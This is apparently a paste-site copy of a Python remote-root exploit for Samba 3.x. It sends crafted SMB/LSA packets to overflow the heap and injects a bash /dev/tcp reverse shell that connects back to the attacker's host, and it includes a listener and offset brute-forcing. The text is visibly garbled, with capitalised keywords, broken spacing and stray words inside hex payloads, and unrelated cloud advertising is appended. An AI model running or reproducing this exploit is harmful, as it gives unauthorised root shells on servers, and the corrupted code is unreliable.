By: a guest on Sep 24th, 2012 | syntax: Python | size: 6.92 KB | hits: 3,930 | expires: Never
#! /Usr/bin/python
#
# Finding targets 4 31337z:
# Gdb/usr/sbin/smbd 'ps auwx | grep smbd | grep-v grep | head-n1 | awk '{print $2} ''<'echo-e "print system" '| grep' $1'
#-> To get system_libc_addr, enter this value in the 'System _ libc_offset 'value of the target_finder, run, sit back, wait for shell
# Found by eax samba 0day godz (loljk)
From binascii import hexlify, unhexlify
Import socket
Import threading
Import SocketServer
Import sys
Import OS
Import time
Import struct
Targets = [
{
"Name": "samba_3.6.3-debian6 ",
"Chunk_offset": 0x9148,
"System_libc_offset": 0xb6d003c0
},
{
"Name": "samba_3.5.11 ~ Dfsg-1ubuntu2.1_i386 (oneiric )",
"Chunk_offset": 4560,
"System_libc_offset": 0xb20
},
{
"Name": "target_finder (hardcode correct system addr )",
"Chunk_offset": 0,
"System_libc_offset": 0xb6d1a3c0,
"Finder": True
}
]
Do_brute = True
Rs = 1024.
FILTER = ''. join ([(len (repr (chr (x) = 3) and chr (x) or '. 'for x in range (256)])
Def dump (src, length = 32 ):
Result = []
For I in xrange (0, len (src), length ):
S = src [I: I + length]
Hexa = ''. join ([" % 02x "% ord (x) for x in s])
Printable = s. translate (FILTER)
Result. append ("% 04x %-* s % s \ n" % (I, length * 3, hexa, printable ))
Return ''. join (result)
Sploitshake = [
# HELLO
"8da-4420434b4644454e4543464445" + \
"46464346474546464343414341434143" + \
"41434143410020454745424644464545" + \
"43455046494341434143414341434143" + \
"4143414341414100 ",
# NTLM_NEGOT
"0000002fff534d427200000000000000" + \
"Zookeeper 1d14" + \
"00000000000c00024e54204c4d20302e" + \
"313200 ",
# SESSION_SETUP
"0000004bff534d427300000000080000" + \
"Commandid was 0000000000000000ffff1d14" + \
"000000000dff000000ff02001d1499" + \
"1f00000000000000000000000000000000e" + \
"000000706f710978007079736d6200 ",
# TREE_CONNECT
"00000044ff534d427500000000080000" + \
"Commandid was 0000000000000000ffff1d14" + \
"6400000004ff00000000000100190000" + \
"5c5c2a534d415345525645525c495043" + \
"24003f3f3f3f00 ",
# NT_CREATE
"00000059ff534d42a200000000180100" + \
"Commandid 0000000000000000000001001d14" + \
"6400000018ff00000000050016000000" + \
"2017100009f010200000000000000" + \
"00000000030000000100000040000000" + \
"020000000306005c73616d7200"
]
Pwnsauce = {
'Smb _ bind ':\
"00000092ff534d422500000000000100" + \
"Commandid 0000000000000000000001001d14" + \
"6400000010000048000004e0ff000000" + \
"Commandid 000000000000004a0048004a0002" + \
"002600babe4f005c504950455c000500" + \
"0b030000000480000000000000b810" + \
"B80000000000000000000001007857" + \
"34123412cdabef000123456789ab0000" + \
"0000045d888aeb1cc9119fe808002b10" + \
"486002000000 ",
'Data _ chunk ':\
"201710efff534d422f00000000180000" + \
"Commandid 0000000000000000000001001d14" + \
"640000000eff000000babe00000000ff" + \
"0000000800b0100000b0103f00000000" + \
"00b0100500000110000000b00000001" + \
"0000009810000000000800 ",
'Final _ chunk ':\
"000009a3ff534d422f00000000180000" + \
"Commandid 0000000000000000000001001d14" + \
"640000000eff000000babe00000000ff" + \
"00000008006409000064093f00000000" + \
"00640905000002100000006409000001" + \
"0000004c09000000000800"
}
Def exploit (host, port, cbhost, cbport, target ):
Global sploitshake, pwnsauce
Chunk_size = 4248
Target_tcp = (host, port)
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
S. connect (target_tcp)
N = 0
For pkt in sploitshake:
S. send (unhexlify (pkt ))
Pkt_res = s. recv (rs)
N = n + 1
Fid = hexlify (pkt_res [0x2a] + pkt_res [0x2b])
S. send (unhexlify (pwnsauce ['smb _ bind']. replace ("babe", fid )))
Pkt_res = s. recv (rs)
Buf = "X" * 20 # policy handle
Level = 2 # LSA_POLICY_INFO_AUDIT_EVENTS
Buf + = struct. pack ('<H', level) # level
Buf + = struct. pack ('<H', level) # level2
Buf + = struct. pack ('<l', 1) # auditing_mode
Buf + = struct. pack ('<l', 1) # ptr
Buf + = struct. pack ('<l', 100000) # r-> count
Buf + = struct. pack ('<l', 20) # array_size
Buf + = struct. pack ('<l', 0)
Buf + = struct. pack ('<l', 100)
Buf + = ("A" * target ['chunk _ offset '])
Buf + = struct. pack ("I", 0 );
Buf + = struct. pack ("I", target ['System _ libc_offset ']);
Buf + = struct. pack ("I", 0 );
Buf + = struct. pack ("I", target ['System _ libc_offset ']);
Buf + = struct. pack ("I", 0xe8150c70 );
Buf + = "AAAABBBB"
Cmd = ";;;; /bin/bash-c '/bin/bash 0 </dev/tcp/"+ cbhost +"/"+ cbport +" 1> & 0 2> & 0 '&\ x00"
Tmp = cmd * (816/len (cmd ))
Tmp + = "\ x00" * (816-len (tmp ))
Buf + = tmp
Buf + = "A" * (37192-target ['chunk _ offset '])
Buf + = 'Z' * (100000-(28000 + 10000 ))
Buf_chunks = [buf [x: x + chunk_size] for x in xrange (0, len (buf), chunk_size)]
N = 0
For chunk in buf_chunks:
If len (chunk )! = Chunk_size:
# Print "last chunk # % d" % n
Bb = unhexlify (pwnsauce ['final _ chunk']. replace ("babe", fid) + chunk
S. send (bb)
Else:
# Print "CHUNK # % d" % n
Bb = unhexlify (pwnsauce ['data _ chunk']. replace ("babe", fid) + chunk
S. send (bb)
Retbuf = s. recv (rs)
N = n + 1
S. close ()
Class connectback_shell (SocketServer. BaseRequestHandler ):
Def handle (self ):
Global do_brute
Print "\ n [!] Connectback shell from % s "% self. client_address [0]
Do_brute = False
S = self. request
Import termios, tty, select, OS
Old_settings = termios. tcgetattr (0)
Try:
Tty. setcbreak (0)
C = True
While c:
For I in select. select ([0, s. fileno ()], [], [], 0) [0]:
C = OS. read (I, 1024)
If c:
If I = 0:
OS. write (1, c)
OS. write (s. fileno () if I = 0 else 1, c)
Counter t KeyboardInterrupt: pass
Finally: termios. tcsetattr (0, termios. TCSADRAIN, old_settings)
Return
Class ThreadedTCPServer (SocketServer. ThreadingMixIn, SocketServer. TCPServer ):
Pass
If len (sys. argv )! = 6:
Print "\ n {*} samba 3.x remote root by kd (eax) @ ireleaseyourohdayfuckyou {*} \ n"
Print "usage: % s <targethost> <targetport> <myip> <myport> <target> \ n" % (sys. argv [0])
Print "targets :"
I = 0
For target in targets:
Print "% 02d) % s" % (I, target ['name'])
I = I + 1
Print ""
Sys. exit (-1)
Target = targets [int (sys. argv [5])]
Server = ThreadedTCPServer (sys. argv [3], int (sys. argv [4]), connectback_shell)
Server_thread = threading. Thread (target = server. serve_forever)
Server_thread.daemon = True
Server_thread.start ()
While do_brute = True:
Sys. stdout. write ("\ r {+} trying eip = \ x1b [31m0x % 08x \ x1b [0 m OFFSET = \ x1b [32m0x % 08x \ x1b [0 m" % (target ['System _ libc_offset '], target ['chunk _ offset '])
Sys. stdout. flush ()
Exploit (sys. argv [1], int (sys. argv [2]), sys. argv [3], sys. argv [4], target)
If "finder" in target:
Target ['chunk _ offset '] + = 4
Else:
Target ['System _ libc_offset '] + = 0x1000
If "finder" in target:
Print \
"{!} Found \ x1b [32mNEW \ x1b [0 m target: chunk_offset = ~ % D ,"\
"System_libc_offset = 0x % 03x" % \
(Target ['chunk _ offset '], target ['System _ libc_offset'] & 0xff000fff)
While 1:
Time. sleep (999)
Server. shutdown ()
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
